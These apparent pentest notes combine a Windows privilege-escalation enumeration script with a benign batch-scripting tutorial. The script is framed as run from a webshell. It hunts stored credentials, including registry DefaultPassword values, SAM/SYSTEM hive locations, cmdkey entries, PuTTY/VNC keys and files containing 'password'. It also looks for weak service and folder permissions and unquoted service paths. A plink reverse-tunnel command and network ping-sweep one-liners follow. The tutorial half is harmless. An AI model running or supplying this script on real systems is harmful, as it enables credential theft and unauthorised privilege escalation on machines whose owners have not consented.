Privilege escalation applications
Batch traversal of directories accessible to the webshell
The PHP directory-walking functions opendir, readdir, is_dir and is_writable lose their advantage for finding an executable directory once PHP is restricted; a batch file can do the listing instead.
@echo off
(For /r c:\ %%a in (*) do echo %%~ta %%~za %%~fa)>list.txt
Privilege escalation batch script
@echo off
set userprofile=%cd%
mode con:cols=160 lines=9999
Cd c:\
echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.
echo ----- Architecture -------
SET Processor
echo.
echo ------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note, in CTF boxes its not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that users rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup
echo ------- Administrators --------
net localgroup administrators
echo ------- Environment Variables -------
set
echo.
echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.
echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention for files that may contain credentials, or files that maybe used as part of a scheduled task. You can typically ignore most default windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.
echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.
echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script but it should always be investigated regardless.
dir /a /b C:\inetpub\
echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.
echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc. the more youll learn which files can be ignored, and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.
echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.
echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.
echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.
echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.
echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ... performing same checks but using cacls instead of icacls (for older versions of Windows)...
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.
echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.
cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.
echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------
cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
echo ------- Network shares -------
net share
echo ------- Programs that run at startup ------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
wmic startup get caption,command
echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldnt find a way to only get system path in DOS (user path does not matter for the purpose of dll hijacking). If powershell is available you can use folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1
echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it).
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.
echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.
echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.
echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.
echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list. Especially for those tasks run by a user other than your own.
tasklist /v
echo.
echo ------- Patches (also listed as part of systeminfo) -------
:: Note on some legacy Windows editions WMIC may fail to install/start/freeze in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines) in which case its important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn
echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump
echo ------ Network information ------
ipconfig /all
:: Routing and ARP tables accessible with these commands... uncomment if you wish, I didnt typically find them helpful for priv esc.
REM route print
REM arp -A
echo.
echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.
echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fall back once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.
echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --"
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.
Windows commands
IPs logged on over 3389
netstat -an
netstat -an | find "3389"
System information
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Firewall status
netsh firewall show state
netsh firewall show config
Scheduled tasks
schtasks /query /fo LIST /v
Using WMIC
Script: http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
Sample output page: http://www.fuzzysecurity.com/tutorials/files/Win7.html
Fileless scanning
Ping the whole class C range and print only the hosts that respond.
for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
Mapping domain machines to IPs
Ping every entry of the net view output in turn and print the machine name and IP address.
FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)
Finding host names
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"
Class B search
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
Windows 7
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Pinging"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Pinging"
change to
for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"
for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"
and it also works on Windows 7 (on Windows 7 the keyword in the ping -a output is "Ping").
Also
findstr /i "pinging" or findstr /i "ping" can be replaced with findstr "[" to suit multilingual environments.
Batch script tutorial
1. Traversing the files in a given folder
1.1 Command explanation
Command: for [parameter] %%variable in (pattern) do (command)
Remember: every token must be separated by a space; there is a space between in and (, and between do and (, otherwise the command will not run.
Note: this section only covers using the for command in a batch script to traverse folders, so the explanation of each token below does not cover its other meanings.
[]: the token is optional
[parameter]: there are four parameter values, /d, /r, /l and /f, plus the case of no parameter, so five cases in all:
- no parameter: traverses the files in the current folder; a path can also be given in (pattern)
- /d: traverses the subfolders of the current folder; a path can also be given in (pattern)
- /r [path]: traverses all files under the given path recursively, so files in subdirectories are visited too; if no path is given, the current path is used
- /l: must be used together with (pattern); the parentheses then take the form (start, step, end), and the for command works like a for statement in Java
- /f: used to parse the contents of a file; not covered in this section
%%variable: plays the role of int i = 0 in for(int i = 0; ; ); the difference is that as the batch for loop walks over the items, %%variable is each item, i.e. %%variable already refers to the concrete item
(pattern): the contents of the parentheses after in can be a wildcard that filters the files in the folder by the given rule, e.g. (*.txt) traverses all files in the folder ending in .txt
(command): the preceding tokens fetch each item in the folder; what to do with each item is written here, like the {} braces after a Java for statement
1.2 Usage examples
The following examples are based on the file paths in the figure above; the batch script is test.bat
- no parameter:
for %%i in (*) do ( echo %%i )
Effect: traverses all files in the current directory
- no parameter, with a path:
for %%i in (c:\softwares\VisualBat\*.url) do ( echo %%i )
Effect: traverses the files ending in .url under the path given in (pattern)
- with /d:
for /d %%i in (*) do ( echo %%i )
Effect: traverses all folders in the current directory
- with /d and a path:
for /d %%i in (c:\softwares\VisualBat\*) do ( echo %%i )
Effect: traverses all folders under the given directory; %%i is the absolute path of each subfolder
- with /r:
for /r %%i in (*.url) do ( echo %%i )
Effect: recursively traverses all files ending in .url under the current path; because the traversal is recursive, %%i is the absolute path of each file
- with /r and a path:
for /r c:\softwares\VisualBat\ %%i in (*.url) do ( echo %%i )
Effect: same as the figure above
- with /l:
for /l %%i in (1, 1, 5) do ( echo %%i )
Effect: equivalent to for (int i = 1; i <= 5; i++) in Java; the start value, the increment or decrement, and the end value can all be set
- with /d /r:
for /d /r %%i in (*) do ( echo %%i )
Effect: parameters can be combined: /d traverses folders and /r recurses, so the command recursively traverses all folders under the current directory, including folders in subdirectories
2. Using temporary variables
2.1 Basic variable usage
Command: set key=value
Remember: there must be no space between key, = and value; do not add spaces to imitate Java style, this differs from Java's int a = 1 declaration.
Using a variable: %key%
Example:
@echo off
set name=dasuAndroidTv
echo %name%
Effect: name can be used as a temporary variable; when using it, enclose the variable name in percent signs
Limitation: a variable cannot be declared inside a for command and used directly as in the previous step, for example:
@echo off
for /l %%i in (0,1,5) do (
    set name=dasuAndroidTv
    echo %name%
)
Effect: declaring a temporary variable inside the for command and using it directly via %key% gives the error shown in the figure above, "ECHO is off." If instead the set key=value declaration is placed outside the for command and the variable is only read inside it, it works, as follows:
@echo off
set name=dasuAndroidTv
for /l %%i in (0,1,5) do (
    echo %name%
)
Effect: declaring the temporary variable outside the for command and only reading it inside is allowed
2.2 Using variables inside the for command
Question: what if the temporary variable has to be declared and used inside the for command?
Using temporary variables inside a for command:
- enable delayed variable expansion with the command: setlocal enabledelayedexpansion
- inside the for command, refer to the temporary variable as !key! (exclamation marks) instead of %key%
- reason: not clear; this is a solution found via Google, search further if you want to dig deeper
Example:
@echo off
setlocal enabledelayedexpansion
set name=dasu
for /l %%i in (0, 1, 5) do (
    set name=dasuAndroidTv
    echo !name!
    echo %name%
)
Effect: put plainly, a temporary variable read inside the for command via %name% always yields the value it was given outside the for command; even if set assigns the variable again inside the for command, %name% does not change.
So, to use a temporary variable right after assigning it with set inside the for command, two steps are needed: first, enable delayed expansion at the top of the file with setlocal enabledelayedexpansion; second, refer to the variable inside the for command as !name!.
3. String handling
3.1 Substrings
Command: %key:~[start,num]%
Explanation: when :~ appears inside %key%, the string that key refers to is sliced; the following forms are supported:
- n characters from a given position: %key:~0,4% takes the 4 characters starting at index 0
- the whole string from a given position: %key:~4% takes the whole string from index 4
- the whole string from a position counted from the end: %key:~-2% takes the whole string from the 2nd character from the end
- n characters from a position counted from the end: %key:~-4,2% takes 2 characters starting at the 4th character from the end
- forward and backward combined: %key:~2,-2% takes the characters from index 2 up to the 2nd character from the end
Example:
@echo off
rem (rem introduces a comment, like // in Java) the original string
set name=dasuAndroidTv
rem the 4 characters starting at index 0: prints dasu
echo %name:~0,4%
rem the whole string from index 4: prints AndroidTv
echo %name:~4%
rem the whole string from the 2nd character from the end: prints Tv
echo %name:~-2%
rem from index 4 up to the 2nd character from the end: prints Android
echo %name:~4,-2%
rem 2 characters starting at the 4th character from the end: prints id
echo %name:~-4,2%
3.2 Concatenation
Command: %key1%%key2%
Explanation: write the string to append directly after the other string; no concatenation operator is needed
Example:
@echo off
set name1=dasu
set name2=AndroidTv
echo %name1%%name2%
rem comment: prints dasuAndroidTv
3.3 Replacement
Command: %key:old=new%
Explanation: no further explanation needed, the example makes it clear
Example:
@echo off
set name=whoAndroidTv
echo %name:who=dasu%
rem comment: prints dasuAndroidTv
3.4 Special file operations
When a for command traverses the files in a folder, a few special modifiers give the various details of each file; see the example directly:
@echo off
for %%i in (*.txt) do (
    echo %%i
    echo %%~fi
    echo %%~di
    echo %%~pi
    echo %%~ni
    echo %%~xi
    echo %%~ti
    echo %%~zi
)
Explanation: when traversing files with for, the content of %%i depends on how for is used; see section 1. In the usage above, %%i refers to each file name in the current directory, the complete file name.
The following special modifiers then return the file's details:
- %%~fi: the absolute path of the file
- %%~di: the drive letter the file is on
- %%~pi: the path of the file, without the drive letter
- %%~ni: the file name without the extension
- %%~xi: the extension of the file
- %%~ti: the last modification time of the file
- %%~zi: the size of the file
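An added example, not from the original page, that combines the /r traversal of section 1, the delayed expansion of section 2.2 and the ~f, ~z and ~t modifiers of section 3.4 into a small inventory of a directory tree. The root directory and the variable names are assumptions: the root comes from the first argument and defaults to the current directory.

```batch
@echo off
setlocal enabledelayedexpansion
rem Assumed root to inventory: the first argument, else the current directory.
set "root=%~1"
if "%root%"=="" set "root=%cd%"
rem Counters changed inside the loop are read with exclamation marks
rem (delayed expansion): percent expansion happens once, when the whole
rem for block is parsed, so it would always see the initial values.
rem Caveat: file names containing an exclamation mark are mangled while
rem delayed expansion is on.
set count=0
set dirs=0
set maxsize=0
set "largest="
rem /r walks every subdirectory under root; the ~f modifier gives the
rem full path and ~z the size in bytes (section 3.4 modifiers).
for /r "%root%" %%F in (*) do (
    set /a count+=1
    rem numeric comparison; sizes above 2 GB exceed cmd's 32-bit integers
    if %%~zF GTR !maxsize! (
        set maxsize=%%~zF
        set "largest=%%~fF"
    )
)
rem /d /r visits the subdirectories themselves, as in section 1
for /d /r "%root%" %%D in (*) do set /a dirs+=1
echo Root: %root%
echo Files: !count!  Subdirectories: !dirs!
if defined largest (
    echo Largest file: !largest!, !maxsize! bytes
    rem a plain for applies the ~t modifier to the delayed variable
    for %%L in ("!largest!") do echo Last modified: %%~tL
)
endlocal
```

Replacing !maxsize! with %maxsize% in the comparison makes every file compare against 0, which is exactly the failure section 2.1 shows.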
3.5 Taking the part before a given character
Most other languages have something like indexOf for strings; in batch, the for statement can process a string to achieve the same effect.
Example:
set name=woshidasusu_android
for /f "delims=_" %%i in ('echo %name%') do (
    echo %%i
)
Output: woshidasusu
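As an added example that is not on the original page, the same for /f technique generalised: tokens=1* yields both the part before and the part after the first delimiter, and the same options read a key=value file line by line. The settings file is constructed by the script itself under an assumed name and deleted at the end.

```batch
@echo off
setlocal enabledelayedexpansion
set name=woshidasusu_android
rem tokens=1 (the default) keeps only the part before the first _, as on the page
for /f "delims=_" %%i in ("%name%") do echo before: %%i
rem tokens=1* puts that part in %%i and everything after the first _ in %%j
for /f "tokens=1* delims=_" %%i in ("%name%") do echo after: %%j
rem Constructed sample settings file (assumed name), one key=value per line;
rem lines starting with ; are comments and are skipped by eol=;
set "cfg=%temp%\settings_example.ini"
> "%cfg%" (
    echo ; constructed sample, not a real configuration
    echo host=example.internal
    echo port=8443
    echo path=C:\data\app_logs
)
rem Read the file line by line: the first token is the key, the rest of
rem the line (tokens=1*) is the value, so a value containing = stays whole.
for /f "usebackq eol=; tokens=1* delims==" %%k in ("%cfg%") do (
    set "cfg_%%k=%%l"
    echo key=%%k value=%%l
)
rem the values are now ordinary variables, so section 3.3 replacement applies
echo host without domain suffix: !cfg_host:.internal=!
del "%cfg%"
endlocal
```

The last echo prints "example": the replacement syntax of section 3.3 works on the variable just filled from the file.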
References
https://www.cnblogs.com/dasusu/p/9058554.html
http://www.fuzzysecurity.com/tutorials/16.html
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/